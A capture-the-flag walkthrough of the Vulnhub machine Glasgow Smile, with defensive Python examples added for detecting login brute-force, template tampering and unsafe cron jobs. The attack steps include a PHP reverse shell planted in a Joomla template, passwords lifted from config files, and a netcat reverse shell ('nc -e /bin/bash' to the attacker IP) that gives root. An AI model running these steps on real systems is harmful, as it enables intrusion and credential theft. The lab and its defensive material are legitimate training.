[VLN] Glasgow Smile

Today we are going to work through the Vulnhub machine called GlasgowSmile. You can download it from the following link: Glasgow Smile

Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 20:44 CEST
Nmap scan report for 192.168.112.138
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
|   256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_  256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds
We take a closer look at port 80.

sml@m0nique:~$ gobuster dir -u http://192.168.112.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.138
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt,php
[+] Timeout:        10s
===============================================================
2020/06/17 20:45:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/joomla (Status: 301)
/how_to.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/06/17 20:47:09 Finished
===============================================================
We see it has a /joomla directory. If we visit http://192.168.112.138/joomla/index.php we can see the website, which contains dialogue from the film, etc. We build a wordlist from it with the following command:

sml@m0nique:~$ cewl http://192.168.112.138/joomla/index.php > dicjoker.txt
Now we start Burp Suite, visit http://192.168.112.138/joomla/administrator/index.php, which is where the Joomla administration panel lives, and try any username so we can capture the login request. Once we have the request, we send it to "Intruder" in Burp Suite and brute-force it. As the username we use "joomla" and as the wordlist the one we just created (dicjoker.txt). After a short while we get the credentials! joomla/Gotham
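The flip side of that Intruder run is what it looks like in the Apache access log: one client posting to the administrator login over and over. The following is an added example (not part of the original write-up) that flags clients posting to the admin login at least a threshold number of times inside a sliding time window. The log lines, the second client's address and the status codes are constructed for the demo; only the login path is taken from the write-up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined-log prefix: client, ident, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/joomla/administrator/index.php"


def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed access-log sample (not taken from the machine): one client sends 20 login
# POSTs in 40 seconds, another browses normally and logs in once. Status codes are illustrative.
SAMPLE_LOG = [
    _line("192.168.112.128", f"17/Jun/2020:20:52:{s:02d} +0200", "POST", LOGIN_PATH, 303)
    for s in range(0, 40, 2)
] + [
    _line("192.168.112.50", "17/Jun/2020:20:52:05 +0200", "GET", "/joomla/index.php", 200),
    _line("192.168.112.50", "17/Jun/2020:20:52:30 +0200", "POST", LOGIN_PATH, 303),
]


def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_login_bursts(lines, threshold=10, window_s=60):
    """Return {ip: time_first_flagged} for clients that POST to the admin login
    at least `threshold` times inside any `window_s`-second window."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        ev = parse(line)
        if not ev or ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in flagged:
            flagged[ev["ip"]] = ev["ts"]
    return flagged


if __name__ == "__main__":
    for ip, when in detect_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: login burst detected at {when:%H:%M:%S}")
```

Run it against a real /var/log/apache2/access.log by passing the file's lines instead of SAMPLE_LOG; the threshold of 10 POSTs per minute is a starting point, and a wordlist-driven run like the one above trips it within seconds.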

Low Shell


Now that we have the credentials, we log in at http://192.168.112.138/joomla/administrator/index.php and prepare a reverse shell.

sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@m0nique:~$ mv php-reverse-shell.php rshell.php
sml@m0nique:~$ nano rshell.php # Edit it to set our IP/port.
We go to Extensions -> Templates -> Templates. Under Styles we see the default is Protostar, so we go to Templates -> Protostar -> index.php and paste the reverse shell there. Click "Save". We set nc listening.

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
And we visit http://192.168.112.138/joomla/index.php

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 57540
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 17:57:31 up  4:14,  0 users,  load average: 0.00, 0.00, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash");'
We're in as www-data :)
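The shell above came from editing a template file through the admin panel, so the defensive counterpart is to know when a template file changes. The following is an added example (not the write-up's code and not anything Joomla ships): it hashes every file under a directory, stores the digests as a JSON baseline, and reports files that were added, removed or modified since. The demo builds a stand-in template tree in a temporary directory; the file names and contents are constructed.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict:
    """Map every regular file below root (path relative to root) to its SHA-256 digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Classify files as added, removed or modified relative to the stored baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def save_baseline(digests: dict, dest: Path) -> None:
    dest.write_text(json.dumps(digests, indent=2, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def demo() -> dict:
    """Constructed scenario in a temp dir: baseline a template tree, then alter it."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp) / "templates" / "protostar"  # stand-in for the Joomla templates dir
        tpl.mkdir(parents=True)
        (tpl / "index.php").write_text("<?php /* constructed stand-in for the template */ ?>\n")
        (tpl / "templateDetails.xml").write_text("<extension/>\n")
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(hash_tree(tpl), baseline_file)

        # Later, the template entry point is edited and an extra file appears.
        with (tpl / "index.php").open("a") as f:
            f.write("<?php /* unexpected addition */ ?>\n")
        (tpl / "extra.php").write_text("<?php /* unexpected new file */ ?>\n")

        return diff_baseline(load_baseline(baseline_file), hash_tree(tpl))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice you would baseline /var/www/html/joomla/templates right after installation, keep the JSON somewhere the web server user cannot write, and run the diff from cron; an unexplained "modified" index.php is exactly the change made above.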

www-data@glasgowsmile:/$ cd /var/www/html/joomla
www-data@glasgowsmile:/var/www/html/joomla$ cat configuration.php
---SNIP---
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
---SNIP---
Now that we have these credentials, we take a look at the database.

www-data@glasgowsmile:/$ mysql -u joomla -p
mysql -u joomla -p
Enter password: babyjoker   
Welcome to the MariaDB monitor.  Commands end with ; or \g.                        
Your MariaDB connection id is 31253                                                
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10                               
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.             
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.  
MariaDB [(none)]> show databases;                                               
                                                                                
show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.003 sec)

MariaDB [(none)]> use batjoke;
use batjoke;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [batjoke]> show tables;
show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment         |
| taskforce         |
+-------------------+
2 rows in set (0.000 sec)

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)
We see there is a "name" rob, the same as one of the system users, so we check whether we can get his password by base64-decoding the string.

sml@m0nique:~$ echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d
???AllIHaveAreNegativeThoughts???
Looks like we have the password :)

sml@m0nique:~$ ssh rob@192.168.112.138
rob@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$

user.txt



rob@glasgowsmile:~$ ls -la
total 52
drwxr-xr-x 3 rob  rob  4096 Jun 16 13:04 .
drwxr-xr-x 5 root root 4096 Jun 15 06:34 ..
-rw-r----- 1 rob  rob   454 Jun 14 03:20 Abnerineedyourhelp
-rw------- 1 rob  rob     7 Jun 17 13:43 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13 12:51 .bash_logout
-rw-r--r-- 1 rob  rob  3526 Jun 13 12:51 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14 03:23 howtoberoot
drwxr-xr-x 3 rob  rob  4096 Jun 13 16:27 .local
-rw------- 1 rob  rob    81 Jun 15 04:08 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13 12:51 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15 04:14 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13 16:41 user.txt
-rw------- 1 rob  rob   429 Jun 16 13:04 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
We take a look at the file called Abnerineedyourhelp

rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd 
rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. 
Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk 
hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn 
rnkud sgd dmhflz. 
RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
It's ciphertext... it looks like something along the lines of ROT13, so we use CyberChef to try ROT13 with different "amounts". We paste the text into CyberChef and select ROT13 with "amount" set to 1. The result is:

Hello Dear, Arthur suffers from severe mental illness but we see little 
sympathy for his condition. This relates to his feeling about being ignored. 
You can find an entry in his journal reads, "The worst part of having a mental 
illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to 
solve the enigma. 
STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
The last string looks like base64, so...

sml@m0nique:~$ echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
We get what looks like a password; let's log in as abner.
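CyberChef with "amount" 1 is a Caesar shift of one position, which is why the letters in the last line of the note change but the digits and the trailing "==" do not. As an added example that is not part of the original write-up, the code below recovers that shift automatically by trying all 26 and scoring each candidate against a small list of common English words, then applies the winning shift to the base64 line and decodes it. The two input strings are copied from the note above; the word list is a constructed one.

```python
import base64
import string

# The first line of the note and its final base64-looking line, copied from the file above.
CIPHER_LINE = "Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd"
CIPHER_B64 = "RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=="

# Small, constructed list of frequent English words used to score candidate shifts.
COMMON_WORDS = {"the", "and", "you", "his", "but", "we", "see", "from",
                "hello", "dear", "little", "with", "this", "is", "of"}


def caesar_shift(text: str, k: int) -> str:
    """Shift every ASCII letter by k positions (wrapping); digits, punctuation and
    base64 symbols such as '+', '/' and '=' pass through unchanged."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + k) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + k) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> int:
    """Count how many words of the candidate plaintext are in COMMON_WORDS."""
    words = text.lower().translate(str.maketrans("", "", string.punctuation)).split()
    return sum(1 for w in words if w in COMMON_WORDS)


def best_shift(text: str) -> int:
    """Try all 26 shifts and return the one whose output contains the most common words."""
    return max(range(26), key=lambda k: english_score(caesar_shift(text, k)))


def decode_note(cipher_line: str, cipher_b64: str):
    """Recover the shift from the prose, apply it to the base64 line too, then base64-decode."""
    k = best_shift(cipher_line)
    plain = caesar_shift(cipher_line, k)
    secret = base64.b64decode(caesar_shift(cipher_b64, k)).decode()
    return k, plain, secret


if __name__ == "__main__":
    shift, plaintext, secret = decode_note(CIPHER_LINE, CIPHER_B64)
    print(f"shift={shift}\n{plaintext}\n{secret}")
```

The same two helpers cover the taskforce table earlier: the pswd column there needs no shift, so base64.b64decode alone turns rob's row into the password used for SSH.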

sml@m0nique:~$ ssh abner@192.168.112.138
abner@192.168.112.138's password: 
Permission denied, please try again.
abner@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:20:04 2020 from 192.168.10.172
abner@glasgowsmile:~$ 

user2.txt



abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
We look for files we can play with.

abner@glasgowsmile:/home/penguin$ find / -user abner 2>/dev/null
/home/abner
/home/abner/user2.txt
/home/abner/.bash_history
/home/abner/.bashrc
/home/abner/.Xauthority
/home/abner/info.txt
/home/abner/.bash_logout
/home/abner/.profile
/home/abner/.ssh
/home/abner/.ssh/known_hosts
/home/abner/.local
/home/abner/.local/share
/home/abner/.local/share/nano
/var/www/html/joker.jpg
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
We see there is a somewhat hidden .zip file... We copy it to /tmp and unzip it using the password we used to log in as abner.

abner@glasgowsmile:~$ cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
abner@glasgowsmile:~$ cd /tmp
abner@glasgowsmile:/tmp$ unzip .dear_penguins.zip 
Archive:  .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password: 
  inflating: dear_penguins
abner@glasgowsmile:/tmp$ cat dear_penguins 
My dear penguins, we stand on a great threshold! It's okay to be scared; many 
of you won't be coming back. Thanks to Batman, the time has come to punish all 
of God's children! First, second, third and fourth-born! Why be biased?! Male 
and female! Hell, the sexes are equal, with their erogenous zones BLOWN 
SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS 
BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
We use the last string as the "password" to log in as penguin.

sml@m0nique:~$ ssh penguin@192.168.112.138
penguin@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:20:25 2020 from 192.168.10.172
penguin@glasgowsmile:~$
We explore the system a bit more.

user3.txt



penguin@glasgowsmile:~$ ls -la
total 40
drwxr-xr-x 5 penguin penguin 4096 Jun 16 11:58 .
drwxr-xr-x 5 root    root    4096 Jun 15 06:34 ..
-rw------- 1 penguin penguin    7 Jun 17 13:43 .bash_history
-rw-r--r-- 1 penguin penguin  220 Jun 15 06:34 .bash_logout
-rw-r--r-- 1 penguin penguin 3526 Jun 15 06:34 .bashrc
drwxr-xr-x 3 penguin penguin 4096 Jun 15 12:01 .local
-rw-r--r-- 1 penguin penguin  807 Jun 15 06:34 .profile
drwxr--r-- 2 penguin penguin 4096 Jun 16 12:52 SomeoneWhoHidesBehindAMask
drwx------ 2 penguin penguin 4096 Jun 15 11:22 .ssh
-rw------- 1 penguin penguin   58 Jun 15 11:20 .Xauthority
penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask/
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la
total 332
drwxr--r-- 2 penguin penguin   4096 Jun 16 12:52 .
drwxr-xr-x 5 penguin penguin   4096 Jun 16 11:58 ..
-rwSr----- 1 penguin penguin 315904 Jun 15 11:45 find
-rw-r----- 1 penguin root      1457 Jun 15 11:50 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root       612 Jun 16 12:50 .trash_old
-rw-r----- 1 penguin penguin     38 Jun 16 12:52 user3.txt
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt 
JKR{284a3753ec11a592ee34098b8cb43d52}
We also look at the other .txt to see if it gives us a hint.

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It 
only runs with root permissions. When it's complete I'll copy it to this folder.

Joker
Knowing this, we use pspy64 to see whether "someone" does something....

penguin@glasgowsmile:/tmp$ wget http://192.168.112.128/pspy64
--2020-06-19 17:46:48--  http://192.168.112.128/pspy64
Connecting to 192.168.112.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64.1’

pspy64.1                 100%[==================================>]   2.94M  
--.-KB/s    in 0.03s   

2020-06-19 17:46:48 (112 MB/s) - ‘pspy64.1’ saved [3078592/3078592]

penguin@glasgowsmile:/tmp$ chmod +x pspy64
penguin@glasgowsmile:/tmp$ ./pspy64

---SNIP---
2020/06/19 17:07:01 CMD: UID=0    PID=786    | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
---SNIP---

Privilege Escalation


We see that root executes the file /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old, which we can edit! We add the following line to get a reverse shell as root:

nc -e /bin/bash 192.168.112.128 5555
The file would look like this.

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old 
#/bin/sh                                                                        
nc -e /bin/bash 192.168.112.128 5555
exit 0
We set nc listening.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
And after a while...

connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 41266
python3 -c 'import pty; pty.spawn("/bin/bash");'
root@glasgowsmile:~# id
id
uid=0(root) gid=0(root) groups=0(root)
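The root cause here is a scheduled job run as UID 0 whose target file is owned by an unprivileged user (ls showed .trash_old as "-rwxr-xr-x 1 penguin root"). The following is an added example (not part of the write-up and not a tool the machine ships) that audits system-crontab entries for exactly this: a job target owned by someone other than the user it runs as, writable by group or others, or missing altogether. The crontab lines, the second job and the uid 1001 for penguin are constructed assumptions, since the write-up only shows the pspy output; a fake stat table stands in for the filesystem so the demo runs offline.

```python
import os
import stat
from dataclasses import dataclass
from typing import Callable, List, Optional

# Constructed /etc/crontab-style entries (the machine's real crontab is not shown in the
# write-up; the .trash_old path is the one pspy reported being run by UID 0).
SAMPLE_CRONTAB = """\
# m  h  dom mon dow user  command
*/1  *  *   *   *   root  /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
0    3  *   *   *   root  /usr/local/sbin/rotate-logs.sh
"""

# Constructed stat results standing in for the live filesystem so the demo runs offline.
# .trash_old was listed as "-rwxr-xr-x 1 penguin root"; uid 1001 for penguin is an assumption.
FAKE_STAT = {
    "/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old": (1001, 0o100755),
    "/usr/local/sbin/rotate-logs.sh": (0, 0o100755),
}


@dataclass
class Finding:
    command: str
    reason: str


def commands_from_crontab(text: str) -> List[str]:
    """Return the executable (first token of the command field) of every system-crontab job."""
    cmds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            cmds.append(fields[6].split()[0])
    return cmds


def assess(owner_uid: int, mode: int, runs_as_uid: int = 0) -> Optional[str]:
    """Explain why a job target is risky: someone other than the executing user can change it."""
    if owner_uid != runs_as_uid:
        return f"owned by uid {owner_uid} but executed as uid {runs_as_uid}"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"writable by group/others (mode {oct(mode & 0o777)})"
    return None


def audit(crontab_text: str, stat_fn: Callable = os.stat) -> List[Finding]:
    """Stat every job target and collect the ones a non-root user could influence."""
    findings = []
    for cmd in commands_from_crontab(crontab_text):
        try:
            st = stat_fn(cmd)
        except FileNotFoundError:
            findings.append(Finding(cmd, "target missing: whoever can write the directory can create it"))
            continue
        reason = assess(st.st_uid, st.st_mode)
        if reason:
            findings.append(Finding(cmd, reason))
    return findings


def _fake_stat(path):
    """Offline stand-in for os.stat driven by the constructed FAKE_STAT table."""
    if path not in FAKE_STAT:
        raise FileNotFoundError(path)
    uid, mode = FAKE_STAT[path]
    return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))


def demo() -> List[Finding]:
    """Run the audit against the constructed crontab and stat table."""
    return audit(SAMPLE_CRONTAB, stat_fn=_fake_stat)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.command}: {f.reason}")
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d with the default os.stat; the fix for a hit like .trash_old is to move the script to a root-owned location such as /usr/local/sbin with mode 0755 and point the job there.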

root.txt



root@glasgowsmile:~# cd /root
cd /root
root@glasgowsmile:~# ls
ls
root.txt  whoami
root@glasgowsmile:~# cat root.txt

Congratulations!

You've got the Glasgow Smile!

JKR{68028b11a1b7d56c521a90fc18252995}


Credits by

mindsflee

End


And with that we are root on the machine :)